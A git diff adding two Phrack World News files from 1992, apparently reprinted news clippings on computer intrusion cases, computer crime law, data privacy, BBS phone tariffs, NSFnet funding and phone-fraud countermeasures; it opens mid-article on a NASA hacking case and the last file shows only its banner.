+      "It became more like a game.  How many systems can you break into?"
+
+While tripping through NASA's most sensitive computer files, Ricky Wittman
+suddenly realized he was in trouble.  Big trouble.
+
+He had been scanning the e-mail, electronic messages sent between two
+scientists at one of NASA's space centers.  They were talking about the
+computer hacker who had broken into the system.  They were talking about
+Wittman.
+
+Curiosity collapsed into panic.
+
+"Logoff now!" 24-year-old Wittman remembers thinking as he sat alone in his
+apartment, staring at his computer screen, in May 1990.  "Hang up the phone.
+Leave the house."
+
+By then it was too late.  The National Aeronautics and Space Administration's
+computer detectives were on the trail.  After 400 hours of backtracking phone
+records, they found the Sandpiper Apartments in Westminster, Colorado.
+
+And they found the inconspicuous third-floor apartment where Wittman -- using
+an outdated IBM XT computer -- perpetrated the most massive hacking incident in
+the history of NASA.
+
+Last week a federal judge sentenced Wittman to three years' probation and
+ordered him to undergo psychiatric counselling.
+
+But perhaps the most punishing aspect to Wittman was the judge's order that he
+not use computers without permission from a probation officer.
+
+"That's going to be the toughest part," Wittman said.  "I've become so
+dependent on computers.  I get the news and weather from a computer."
+
+In his first interview since a federal grand jury indicted him in September,
+Wittman expressed regret for what he had done.
+
+But he remained oddly nonchalant about having overcome the security safeguards
+designed by NASA's best computer minds.
+
+"I'll level with you. I still think they're bozos," Wittman said.  "If they had
+done a halfway competent job, this wouldn't have happened."
+
+Prosecutors didn't buy Wittman's argument.
+
+"No software security system is foolproof," wrote assistant U.S. attorney
+Gregory Graf.  "If a thief picks the lock on the door of your home, is the
+homeowner responsible because he didn't have a pick-proof lock on the front
+door?"
+
+Breaking into the system was just that easy, Wittman said, so much so that it
+took him a while to realize what he had done.
+
+He had been fooling around inside a public-access NASA computer bulletin-board
+service in 1986, looking for information on the space-shuttle program.  He
+started toying with a malfunction.
+
+"The software went blooey and dumped me inside," Wittman said.  "At first, I
+didn't know what happened.  I pressed the help key.  I realized after a while
+that I was inside."
+
+Somehow, Wittman -- then 18 -- had found a way to break out of the bulletin
+board's menu-driven system and into a restricted-access area full of personal
+files.
+
+Once past the initial gate, it didn't take Wittman long to find the file of a
+security manager.  Wittman picked up a password for another system, and the
+romp began.
+
+"Then I started looking around, and it became more like a game," he recalled.
+"How many systems can you break into?"
+
+By the federal government's count, Wittman eventually hacked his way into 115
+user files on 68 computer systems linked by the Space Physics Analysis Network.
+His access extended as far as the European Southern Observatory in Munich,
+Germany.
+
+Given the chance, Wittman could have gone even farther, prosecutors contend. In
+an interview with the FBI, Wittman told agents he accidently had come across
+the "log on" screen for the U.S. controller of the currency.  Wittman said he
+didn't try to crack that password.
+
+"The controller of the currency is a little out of my league," he said.
+_______________________________________________________________________________
+
+ Georgia Teenage Hacker Arrested                                 March 19, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Jim Mallory (Newsbytes)
+
+LAWRENCEVILLE, GEORGIA -- A Georgia teenager has been arrested on charging of
+illegally accessing data files of several companies in a attempt to inject a
+computer virus into the systems.
+
+The alleged computer hacker, who was originally charged with the illegal access
+charges two weeks ago, was re-arrested on felony charges at his high school
+this week on the additional charges of attempting to infect the computer
+systems.
+
+The 18-year old boy allegedly broke into computers of BellSouth, General
+Electric Company, IBM, WXIA-TV in Atlanta, and two Gwinnett County agencies,
+who were not identified.
+
+The boy's 53-year-old mother was also arrested, charged with attempting to
+hinder her son's arrest by trying to have evidence against him destroyed.
+
+Computer users' awareness of computer viruses was heightened recently over the
+so-called Michelangelo virus, which some computer security experts thought
+might strike tens of thousands of computers, destroying data stored on the
+system's hard disk.  Perhaps due to the massive publicity Michelangelo
+received, only a few hundred PCs in the US were struck.
+
+Hackers access computers through telephone lines.  Passwords are sometimes
+obtained from underground bulletin boards, are guessed, or can be obtained
+through special software programs that try thousands of combinations, hoping to
+hit the right one.
+
+A recent Newsbytes story reported the conviction of a Denver area resident, who
+was sentenced to three years probation and ordered not to use computers without
+permission after attempting to break into a NASA (National Aeronautics and
+Space Administration) computer.
+
+Officials and victims are usually reluctant to give details of computer break-
+ins for fear of giving other would-be hackers ideas.
+_______________________________________________________________________________
+
+ Hacker Surveillance Software                                    March 21, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Susan Watts, Technology Correspondent for The Independent (Page 6)
+
+                  "Hacker 'Profiles' May Curb Computer Frauds"
+
+The Federal Bureau of Investigation is dealing with computer hackers as it
+would rapists and murderers -- by building "profiles" of their actions.
+
+Its computer researchers have discovered that, in the same way that other
+offenders often favour the same weapons, materials or times of day to
+perpetrate their crimes, hackers prefer to use trusted routines to enter
+computer systems, and follow familiar paths once inside.  These patterns can
+prove a rich source of information for detectives.
+
+The FBI is developing a modified version of detection software from SRI
+International -- an American technology research organization.  Teresa Lunt, a
+senior computer scientist at SRI, said hackers would think twice about breaking
+into systems if they knew computer security specialists were building a profile
+of them.  At the very least, they would have to constantly change their hacking
+methods.  Ms. Lunt, who is seeking partners in Britain to help develop a
+commercial version of the software, believes hackers share with psychotic
+criminals a desire to leave their hallmark.
+
+"Every hacker goes through a process peculiar to themselves that is almost a
+signature to their work," she said.  "The FBI has printed out long lists of the
+commands hackers use when they break in.  Hackers are surprisingly consistent
+in the commands and options they use.  They will often go through the same
+routines.  Once they are in they will have a quick look around the network to
+see who else is logged on, then they might try to find a list of passwords."
+
+SRI's software, the development of which is sponsored by the US Defense
+Department, is "intelligent" -- it sits on a network of computers and watches
+how it is used.  The software employs statistical analysis to determine what
+constitutes normal usage of the network, and sets off a warning if an
+individual or the network behaves abnormally.
+
+A more sophisticated version of the program can adapt itself daily to
+accommodate deviations in the "normal" behavior of people on the network.  It
+might, for example, keep track of the number of temporary files created, or how
+often people collect data from an outside source or send out information.
+
+The program could even spot quirks in behavior that companies were not
+expecting to find.
+
+The idea is that organizations that rely on sensitive information, such as
+banks or government departments, will be able to spot anomalies via their
+computers.  They might pick up money being laundered through accounts, if a
+small company or individual carries out an unusually large transaction.
+_______________________________________________________________________________
diff --git a/phrack38/14.txt b/phrack38/14.txt
new file mode 100644
index 0000000..88ea9e9
--- /dev/null
+++ b/phrack38/14.txt
@@ -0,0 +1,584 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 14 of 15
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN      Issue XXXVIII / Part Two of Three      PWN
+              PWN                                             PWN
+              PWN        Compiled by Dispater & Friends       PWN
+              PWN                                             PWN
+              PWN     Special Thanks to Datastream Cowboy     PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ What's Wrong With The Computer Crime Statute?                February 17, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Thomas A. Guidoboni (ComputerWorld)(Page 33)
+
+             "Defense and prosecution agree the 1986 Computer Fraud
+              and Abuse Act is flawed but differ on how to fix it."
+
+It has become an annual ritual, since the birth of the Internet worm, for
+Congress to consider amendments to the 1986 Computer Fraud and Abuse Act.  At
+this point, the U.S. Department of Justice can be expected to advocate three
+things: an expansion of the federal role in the investigation and prosecution
+of computer crimes, the creation of new categories of offenses, and harsher
+penalties, including perhaps the current darling of the department, forfeiture
+of property.
+
+Since the law is of recent origin, was substantially revised in 1986 and proved
+more than adequate to prosecute and convict Robert T. Morris, there seems
+little justification for expansion of its coverage.
+
+Nevertheless, if Congress is determined to review and revise the provisions of
+the act, there are several narrow, but significant, amendments that are clearly
+warranted.  Of primary importance is the definition of terms.  The core of the
+law suffers from a lack of clarity.  Offenses are described by reference to
+"authorized" or "unauthorized access," yet these terms are not defined
+anywhere.
+
+Perilously Vague
+
+In a universe that consists of broad computer networks, bulletin boards, E-mail
+and anonymous file-transfer protocols, and one in which permissions and rights
+are established by custom, usage and private understandings, a person is left
+to speculate at his peril as to what conduct is permitted and what is
+prohibited by this vague language.
+
+The Computer Fraud and Abuse Act should be amended to give precise content to
+the concepts of "access" and "authorization," thereby providing fair warning of
+illegal conduct.
+
+A second change for the better regarding the act would be to create a
+distinction between those computer intruders who unintentionally cause a
+monetary loss and those who maliciously cause such harm.
+
+The present law, as interpreted in the Morris case, recognizes no such
+distinction.  This is contrary to long-standing notions of fairness in our
+system of criminal law, which acknowledges that between two persons who cause
+the same harm, the one who intended that result is more culpable than the one
+who did not.
+
+A third part of the statute that needs revision relates to computerized medical
+records.  It is too broad because it includes as felonious conduct the
+unauthorized access to such records that "potentially modifies or impairs"
+medical treatment or care.  Virtually every unauthorized access to computers
+containing medical records carries this potential.  A better solution would be
+simply to make any "unauthorized access" of computerized medical records data a
+misdemeanor, with the intentional modification or destruction of such data
+designated as a felony.
+
+Amend, But Don't Expand
+
+These slight but important amendments would serve to clarify and improve a
+basically sound law without stifling the creativity of persons akin to those
+who have been responsible for many of the advances in computer technology in
+this country.  More expansive revisions are ill-advised, as they may
+unnecessarily encroach on evolving privacy and free-expression interests.
+
+A broadening of federal involvement is also inappropriate.  Nearly every state
+has enacted laws against computer fraud and abuse and, as Congress recognized
+in 1986, federal jurisdiction should be limited to cases where there is a
+compelling federal interest.  This might include instances where computers
+belonging to the federal government or to financial institutions are involved,
+or cases where the crime itself is interstate in nature.  Furthermore, other
+computer crimes should be left to prosecution by the individual states, as is
+presently the case.
+
+In sum, the 1986 Computer Fraud and Abuse Act would benefit from some
+clarification, but expansion of its coverage and wholesale revisions are both
+ill-advised and unnecessary.
+
+Note:  Thomas A Guidoboni is an attorney with Bonner & O'Connell in Washington,
+       D.C.  He represented Robert T. Morris in the Internet virus case.
+_______________________________________________________________________________
+
+ Private Social Security Data Sold to Information Brokers     February 29, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By R.A. Zaldivar (San Jose Mercury News)
+
+Washington, D.C. -- The privacy of 200 million Americans with records at the
+Social Security Administration is threatened by an illegal trade in pilfered
+computer files.  Computerization has dramatically improved our ability to serve
+the public," Social Security Deputy Commissioner Louis Enoff told a Senate
+panel.  "However, it has also made confidentiality more difficult."
+
+Two executives of Nationwide Electronic Tracking, a Tampa, Florida, company,
+pleaded guilty to conspiracy charges in January for their part in a national
+network selling Social Security records.  Twenty-three people, including agency
+employees and police officials, have been indicted in the case -- the largest
+known theft of government computer data.  "Information brokers" will pay Social
+Security employees $25 for a person's earnings history and then sell the data
+for as much as $300.  Their growing list of customers includes lawyers, private
+investigators, employers, and insurance companies.
+
+Social Security records contain a mother lode of information that includes not
+only a person's past earnings but names of employers, family history and even
+bank account numbers of people who receive benefits by direct deposit.  The
+information can be used to find people or to make decisions on hiring, firing,
+suing or lending, said Larry Morey, deputy inspector general of the Health and
+Human Services Department.
+
+"Here we have a large-scale invasion of the Social Security system's
+confidentiality," said Senator Daniel P. Moynihan, D-N.Y., chairman of the
+Social Security subcommittee.
+
+Information from other government data bases with records on individuals --
+such as the FBI's National Criminal Information Center -- is also available on
+the underground market.  All a broker needs is the cooperation of a clerk at a
+computer terminal.
+
+Congress may revise privacy laws to increase penalties for illegally disclosing
+information in the private files of individuals.
+
+Enoff said Social Security is studying ways to improve computer security, as
+well as keeping closer tabs on employees with access to files, and stressing to
+its workers that unauthorized disclosure of information is a federal crime.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Related articles can be found in Phrack World News, Issue 37, Part One:
+
+ Indictments of "Information Brokers"                              January 1992
+ Taken from The Privacy Journal
+
+ SSA, FBI Database Violations Prompt Security Evaluations      January 13, 1992
+ By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41)
+_______________________________________________________________________________
+
+ Back to Act I                                                    March 3, 1992
+ ~~~~~~~~~~~~~
+ Taken from Communications Daily (Page 2)
+
+"Supreme Court Lets Stand Ruling That FCC Ban On Indecency Is Unconstitutional"
+
+FCC's 24-hour ban on indecent programming is unconstitutional, U.S. Supreme
+Court ruled in refusing to consider unanimous U.S. Appeals Court, D.C.,
+decision.  Supreme Court action also effectively overruled December 1988 rider
+to Senate appropriations bill directing FCC to ban all indecent programming.
+Last summer, en banc Appeals Court had refused to reconsider May decision by
+unanimous 3-judge panel that FCC ban is unconstitutional.
+
+FCC, with support of Justice Department, had asked Supreme Court to reconsider
+case.  Coalition of 14 intervenors, including Action for Children's TV (ACT),
+had opposed FCC in Appeals Court and Supreme Court.  En banc Appeals Court said
+that none of 13 judges who participated "requested the taking of a vote" on
+whether to rehear case.  On Supreme Court, Justices Sandra O'Connor and Byron
+White voted to reconsider case. FCC's definition of indecency:  "Language or
+material that depicts or describes, in terms patently offensive as measured by
+contemporary community standards . . . sexual or excretory activities or
+organs."  Agency has fined several stations for indecent programming in the
+last year.
+
+With loss in Supreme Court, FCC official told us "we don't have any choices
+left" but to permit such programming to be broadcast.  "We're back to Act I."
+Source predicted, and other FCC officials agreed, that agency soon will issue
+rulemaking to make a ban on indecent programming later than 8 p.m.  Same
+sources expect Congress once again to take up issue.
+
+ACT President Peggy Charren said: "It's very exciting for ACT to have won one
+for the First Amendment.  We always knew it's preposterous for the FCC to try
+to ban speech at 3 o'clock in the morning to protect children . . . It's very
+satisfying to have this particular [conservative] Supreme Court agree with us."
+NAB (which also was intervernor in case) Associate General Counsel Steve
+Bookshester said Supreme Court "correctly" acted in not reviewing lower court
+decision:  "Now, it's up to the Commission to adopt new procedures to determine
+when such material is permitted to be broadcast."  Washington attorney Timothy
+Dyk, who represented intervenors, said: "I think it's a very happy result . . .
+The Court of Appeals decision is exactly where it should be in terms of a safe
+harbor."
+_______________________________________________________________________________
+
+ Drug Enforcement Data Are Vulnerable Through Phone Lines         March 4, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Communications Daily (Page 5)
+
+Classified information in computers of Drug Enforcement Administration (DEA) is
+at risk, General Accounting Office (GAO) said in a report.  It said DEA doesn't
+provide adequate protection of classified information because too many people
+have access to computers that store data, and computers with classified
+information are hooked into nonsecure telephone lines, making them vulnerable
+to outside intrusion.
+
+Report, Computer Security:  DEA Is Not Adequately Protecting National Security
+Information (GAO/IMTEC-92-31), said it found several instances of lax physical
+and electronic security at DEA computers in several locations.  Although there
+are no known instances of security breaches, "these disturbing security
+weaknesses pose serious risks that could potentially hinder DEA's mission and
+threaten the lives of federal agents," the report said.  The report found that
+DEA isn't complying with standard security guidelines outlined by National
+Security Agency.
+
+In preliminary findings, GAO was so concerned with security weaknesses that it
+called in Department of Justice on January 9 and furnished it with a "limited
+official use" version of its report to give DEA time to correct problems, said
+Rep. Wise (D-W.Va.), chairman of House Government Operations Subcommittee, who
+ordered the investigation.  He said other government agencies should be wary of
+sharing information with DEA until security problems have been eliminated.
+Calls to DEA on progress of follow-up security procedures weren't returned.
+Findings are "indicative" of typical "apathetic security attitude" that the
+government has, said David Banisar, security expert for Computer Professionals
+for Social Responsibility.
+
+GAO investigators found DEA couldn't adequately identify what computers used
+classified information.  "DEA cannot ensure that adequate safeguards are in
+place for protecting national security information," report said.  In spite of
+federal guidelines, GAO found that DEA hasn't "completed a risk analysis" of
+computer system.  Some classified computers were found to be operated in areas
+where contractors -- with no security clearances -- moved around with no
+restrictions.  No computers were found to be "tempest" hardened, meaning
+electronic emissions from keyboards can't be picked up.
+
+In light of concern on outside intrusion from "hackers," GAO found several DEA
+computers were connected by phone lines "that are not encrypted" -- which it
+described as clear violation of national security guidelines.  The report said
+"unauthorized individuals can intercept or monitor information emanating from
+and transmitted by" the agency without being detected.  Classified information
+was found to be stored on hard disks in an "inadvertent" manner, allowing for
+the possibility that computers, when resold, still might hold data.  One such
+occurrence, recorded by GAO in its report, occurred last year when sensitive
+grand jury information on informants was left on surplus computers sold by DoJ
+at a public auction.
+
+The report said that DEA has acknowledged weaknesses "and is taking action to
+correct them."
+_______________________________________________________________________________
+
+ BBS Controversy Brews Close To Home                                 March 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Puget Sound Computer User
+ Special Thanks: Peter Marshall in Telecom Digest
+
+In a case before the Public Utility Commission of Oregon, US West is
+maintaining three phone lines connected to a free-access BBS in a residence
+should be billed at business rates.  Because of the similarities in tariffs
+>from state to state and US West's position in the case, many are predicting
+that if US West prevails, the company will be authorized to raise all Oregon
+BBS lines to business rates and try to raise rates for BBS lines in US West's
+remaining 13 states.
+
+The case started when Tony Wagner, a Portland system operator, received a
+letter from US West in October, 1991.  In the letter, Communications Consultant
+Sandi Ouelette said "Bulletin board services are considered a business,
+therefore, subject to business rates ..."
+
+One Seattle attorney interested in telecommunications said these attempts by
+the phone companies to raise rates for BBSes are "just another attempt to swipe
+people's communication."
+_______________________________________________________________________________
+
+ 1-800-54-PRIVACY                                                March 10, 1992
+ ~~~~~~~~~~~~~~~~
+ Taken from Communications Daily
+
+American Newspaper Publishers Association (ANPA) President Cathleen Black asked
+American Paper Institute to support the newspaper industry's fight against
+RHCs, warning that the market for paper could drop if phone companies are
+allowed to expand activities into information services.  Increased electronic
+classified ads and other services could lead to cutbacks in demand for
+newsprint, Black said.  Newspaper producers, traditionally allied with ANPA,
+said they would study the matter.
+
+Meanwhile, full-page newspaper ads placed by ANPA and allied Consumer
+Federation, Graphic Communications International Union, National Newspaper
+Association, and Weatherline have generated thousands of calls to an 800 number
+>from readers concerned about potential invasions of privacy by telephone
+companies.  The latest ad ran in the March 7 Washington Post, under the
+headline:  "Unless they're stopped, the Bells will know more about you than
+even the IRS." The ad advised callers to dial 1-800-547-7482, referred to in
+the telephone message as "1-800-54-privacy."
+
+Gary Slack, of the Chicago PR firm Slack, Brown & Myers, which is coordinating
+the 800 campaign, said that the angle in the ad has become an effective weapon
+against RHCs because "there are a lot of people concerned about privacy."
+Callers are sent a 4-page letter signed by Black and "action guidelines" for
+asking legislators to support bills by Representative Cooper (D-Tenn.)
+(HR-3515) and Senator Inouye (D-Hawaii) (S-2112) that would restrict RHC entry
+into information services.  ANPA has argued that, through data on telephone
+bills, information can be collected about callers.
+
+RHCs didn't have the incentive to use that data before, but now with the
+ability to offer information services, they do, ANPA said.  ANPA generally
+doesn't pay for ads, but offers them to newspapers to run when they have space,
+a spokesman said.  Pacific Telesis Vice-President Ronald Stowe said ANPA ads
+"show desperation and questionable ethics."  He said ANPA is using some of same
+tactics it has accused RHCs of using, including collecting information on
+subscribers.  ANPA ads are "really sewer-level stuff," Stowe said:  "There are
+enough legitimate issues that ought to be debated."
+
+*** Editor's Note:  For more information on this story, please see "Standing Up
+    To Fight The Bells" by Knight Lightning in this issue of Phrack.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Missouri Bulletin Board Case Settled                            March 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Communications Daily (Page 6)
+
+Southwestern Bell in Missouri has filed a new tariff with the Missouri Public
+Service Commission (PSC) to allow computer bulletin board (BBS) operators to
+use residential lines.  The tariff would take effect April 10 if there are no
+complications.  Under proposal, the BBS operators at homes would be allowed to
+continue to use residence lines if they don't "solicit or require any
+remuneration, directly or indirectly, in exchange for access" and use 4 or
+fewer residential lines priced at flat rates.
+
+BBSes that don't meet those requirements would be required to use business
+lines.  The tariff, negotiated between SWB and representatives of BBS
+operators, defines a BBS as "a data calculating and storage device(s) utilized
+as a vehicle to facilitate the exchange of information through the use of
+Southwestern Bell Telephone Company facilities."  BBS language is part of a
+high-grade Information Terminal Service originally aimed at business users with
+computers, but interpreted by BBS operators as targeted at them.  SWB
+originally had wanted to make the new service mandatory for computers with
+modems, but the new proposal, submitted March 11, makes it optional.
+
+*** Editor's Note:  For more information, please see the numerous articles on
+    this topic in Phrack World News, Issue 37, Part 3.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+In a surprising turn of events, the April 14, 1992 issue of Communications
+Daily reports that U.S. West in the state of Washington has decided not to
+follow the example of Oregon attempt to raise rates for electronic bulletin
+board (BBS) hobbyists.
+
+Patsy Dutton, consumer affairs manager for Washington Utilities &
+Transportation Commission (WUTC), asked U.S. West about its policy after
+receiving request from BBS operators.
+
+In a letter dated March 31 to system operator Bruce Miller, Dutton said she had
+reviewed U.S. West tariff and had talked with company representatives as to
+current and future plans for BBS service:  "The company indicates it has no
+intention of changing its current procedure."  Residential service would be
+available for hobbyists, with business rates applying under other conditions.
+
+An Oregon PUC law judge is currently considering complaint against U.S. West
+for raising rates of bulletin board operators there.
+_______________________________________________________________________________
+
+ Congress Explores Dropping Subsidy of Federal Science Network   March 13, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Communications Daily (Page 6)
+
+                          "Fairness For All Is Urged"
+
+In hearing, Representative Boucher (D-Va.) questioned National Science
+Foundation (NSF) on its management policies and future direction of NSFnet,
+national research network.  He said it's "essential" that NSFnet be structured
+so all commercial providers of network services "receive equal treatment" and
+that government policy for managing the network "not favor any provider" or set
+of providers.
+
+The current process of using federal money to subsidize NSFnet is "obsolete"
+said Mitchell Kapor, representing Commercial Internet Exchange (CIX)
+Association, a consortium of commercial network services suppliers.  Although
+federal money was necessary in the "early stages," when technology for building
+the network still was "experimental," now that the network is in place,
+government subsidy should stop, Kapor said.  He said CIX members can provide
+"any level of service" needed by the same community served by NSFnet --
+research and education.  Kapor said CIX members could build and service
+national backbones with "off-the-shelf" technology; however, he said, because
+federal money goes to support the current network backbone, NSFnet users are
+allowed on the network free and don't have an incentive to use commercial
+services.
+
+William Schrader, president of Performance Systems International (PSI), said
+government could level the playing field by providing money directly to
+individual universities and letting them choose, on a "free-market" basis,
+which network service provider to use.  That system, he said, would provide
+incentive for several suppliers to upgrade networks in efforts to corral most
+customers.  Kapor said it also would "push the envelope" of technology to an
+even greater level.  With the current system in place, the technological level
+of the network will evolve more slowly because there would be no incentive to
+provide a higher level of service, he said.
+
+Current users of NSFnet spoke against changing the status quo.  Michael
+Roberts, VP-networking for Educom, a task force of 48 universities, said that
+removing funding for the network would be "horrendous."  By requiring
+individual universities to seek out their own service providers, he said,
+government would have to institute another level of bureaucracy, creating
+"thousands of entitlements," which would be impossible logistically.  Douglas
+Van Houweling, speaking for NSFnet manager Merit, said removal of funding most
+likely would upset the networks' level of stability, leading to disruption in
+service that "millions of users" have become accustomed to.  By letting "any
+number" of commercial providers supply network services, there would be no
+guarantee of level of service, which is a "vital" mission of research labs,
+universities and federal agencies now using the network, Van Houweling said.
+
+Federal agencies would rather have a stable network than improved service, said
+Stephen Wolff, director of NSF's Networking & Communications Division.  He told
+Boucher that federal agencies didn't want the network open to competition
+because they feared it would degrade the quality of service.  Wolff said NSF
+would proceed with its plan to commercialize network "within 5 years" as
+requested under the recently voted High-Performance Computing Act.  He also
+said he had presented to universities the idea of providing them with federal
+money and letting them purchase network services in the free market.  The
+proposal was "soundly rejected," he said, because universities didn't feel they
+were able to make such decisions. Instead, they supported NSF's current
+proposal of rebidding network management so that 2 network providers would be
+in place.  The new system would operate on model of government's FTS 2000
+program. NSF would grant awards for network services to 2 companies and have an
+independent 3rd party act as "traffic manager" to ensure one network provider
+wasn't favored over another.
+_______________________________________________________________________________
+
+ MCI and Sprint Take Steps To Cut Off Swindlers                   April 1, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Kent Gibbons (The Washington Times)(Page C1)
+
+MCI and Sprint are cracking down on telephone fraud.
+
+The two long-distance carriers are tackling different kinds of swindles,
+though:
+
+    * MCI said it will stop sending out bills for pay-per-call operators who
+      promise help getting a loan, credit, a credit card or a job.
+
+    * Sprint said it will offer large business customers a form of liability
+      insurance against unauthorized use of corporate switchboard lines.
+
+MCI Communications Corporation of the District said it wanted to protect
+consumers who might be gulled into overpaying for some "900-number" services
+during economic troubles.
+
+But long-distance carriers are also guarding their own bottom lines by
+tightening up pay-per-call standards, said telecommunications analyst James
+Ivers.
+
+"They're acting fiscally responsibly because traditionally, these were the
+types of programs that created a high level of uncollectible" bills when
+ripped-off consumers refused to pay, said Mr.  Ivers, senior analyst with
+Strategic Telemedia, a consulting firm in New York.
+
+Last September, Sprint Corporation, of Kansas City, MO, told more than 90
+percent of its 900-number customers it would no longer do their billing.  Long-
+distance firms cannot refuse to carry pay-per-call services, but most 900-
+number operators do not want the expense and trouble of doing their own
+collections.
+
+American Telephone & Telegraph Co., of New York, said it has set up strict
+guidelines for all 900-number firms, such as disclosing in advertising any fees
+charged for credit processing.
+
+AT&T spokesman Bob Nersesian said:  "We still think there are legitimate
+providers of this kind of service and our guidelines keep the dishonest guys
+off the network."
+
+Sprint's switchboard-fraud liability protection is aimed at big customers,
+whose Sprint bills are more than $30,000 per month.
+
+For an installation fee (up to $5,000) and a monthly charge (also up to
+$5,000), Sprint will absorb fraudulent phone charges above $25,000 per
+switchboard.  The customer pays the first $25,000.  Sprint's liability ends at
+$1 million.
+
+Large and medium-sized companies can rack up huge bills if their private
+switches, known as private branch exchanges or PBXes, are broken into and used
+to make calls to other countries.
+
+In a recent case, more than 20,000 calls were made on a company's PBX over a
+weekend, with the charges estimated at more than $1 million, said M.R. Snyder,
+executive director of Communications Fraud Control Association, a Washington
+trade group.
+
+"It is certainly a fraud target that is ripe for being abused," Ms. Snyder
+said, especially since telephone carriers have improved their ability to spot
+unauthorized credit-card calls more quickly.
+
+Overall, telecommunications fraud costs phone carriers and customers an
+estimated $1.2 billion per year, although the figure is really just a
+"guesstimate," Ms. Snyder said.
+
+Company PBXes often have features that allow traveling employees, or distant
+customers, to call in and tap an outgoing line.  With computer programs,
+hackers can randomly dial numbers until they hit security codes.
+
+Sometimes the codes are only four digits, so hackers don't even need a
+computer, said Bob Fox, Sprint's assistant vice president of corporate
+security.
+
+Along with the fees, customers must agree to take certain precautions.  Those
+include using security codes at least eight digits long and eliminating the
+ability to tap outside lines through voice mail.  In return, Sprint will also
+monitor PBX use every day, instead of the five days per week currently done
+free for customers, Mr. Fox said.
+
+MCI spokesman John Houser said his company will be watching Sprint to see if
+the program is a success.  Spokesman Andrew Myers said AT&T offers fraud
+protection to some corporate customers, but is not considering extending that
+to cover PBX abuse.
+
+AT&T is currently involved in several lawsuits over disputed PBX charges that
+total "many millions" of dollars, Mr. Myers said.  Sprint officials said they
+have not sued any customers to collect on PBX fraud bills.
+_______________________________________________________________________________
+
+ Sprint Offers Liability Limit For Corporate Phone Fraud          April 1, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Edmund L. Andrews (New York Times)(Page D4)
+
+The Sprint Communications Company, the nation's third-largest long-distance
+carrier, said that it would limit the liability of large corporate customers
+for the huge bills rung up by phone-service thieves who manipulate a company's
+telephone switching equipment and voice-mail systems.
+
+Typically, such thieves call into a company on one of its toll-free "800"
+numbers and then figure out the codes necessary to obtain an outgoing line that
+can be used to call anywhere in the world.  These telephone "hackers" often
+sell plundered telephone codes to illegal operators who then sell overseas
+calls to hundreds of people at a time.  Sprint officials said this sort of
+fraud approached $1 billion a year.
+
+The new Sprint plan would be available to companies that signed two-year
+contracts to buy at least $30,000 of international long-distance service a
+month and agreed to adopt a series of protective measures.  These include
+installing longer telephone codes that are harder for thieves to crack and new
+limits on the ability of voice-mail systems to obtain outgoing lines.
+
+In exchange, customers would be held responsible for no more than $25,000 in
+stolen calls for each round of break-ins, and a maximum limit of $1 million a
+year.  Although that is still a substantial sum, it is much less than many
+companies have lost in recent years from theft of service by telephone hackers.
+
+A Point of Contention
+
+Thieves broke into the switchboard of Mitsubishi International in New York in
+1990, for example, and ran up $430,000 in overseas telephone calls.  Procter &
+Gamble lost $300,000 in a similar incident in 1988.  Had either company been
+operating under the new Sprint plan, its liability would have been limited to
+$25,000.
+
+Long-distance carriers and their corporate customers have long argued over who
+should bear responsibility for the huge bills caused by service theft.  The
+carriers have maintained that their customers are responsible for these bills,
+even if fraud is undisputed, arguing that the thieves took advantage of
+weaknesses in the customers' equipment, rather than in the weaknesses of the
+long-distance network itself.
+
+But some corporate victims have argued that they had no idea their systems were
+vulnerable, while others contend that they incurred big losses even after
+adopting special security procedures.
+
+MCI Moves Against '900' Fraud
+
+In a separate issue involving telephone fraud, MCI Communications Corporation
+said it would no longer provide billing services for companies that use "900"
+numbers to offer credit cards, and that it would place tough new restrictions
+on the use of 900 numbers to sell job-placement services, contests and
+sweepstakes.
+
+The long-distance company said its decision was based on numerous complaints
+about abusive and fraudulent sales practices.  Companies that provide
+information through the use of telephone numbers with the 900 area code charge
+callers a fee each time they call the number.  MCI and other long-distance
+companies carry these calls and bill customers on behalf of the company that
+provides the information service.
+
+Pam Small, an MCI spokeswoman, declined to say how much revenue the company
+would lose because of the suspension.  But she said the 900 services that would
+be affected represented a small part of its pay-per-call business.
+_______________________________________________________________________________
diff --git a/phrack38/15.txt b/phrack38/15.txt
new file mode 100644
index 0000000..b128597
--- /dev/null
+++ b/phrack38/15.txt
@@ -0,0 +1,587 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 15 of 15
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN     Issue XXXVIII / Part Three of Three     PWN
+              PWN                                             PWN
+              PWN        Compiled by Dispater & Friends       PWN
+              PWN                                             PWN
+              PWN     Special Thanks to Datastream Cowboy     PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
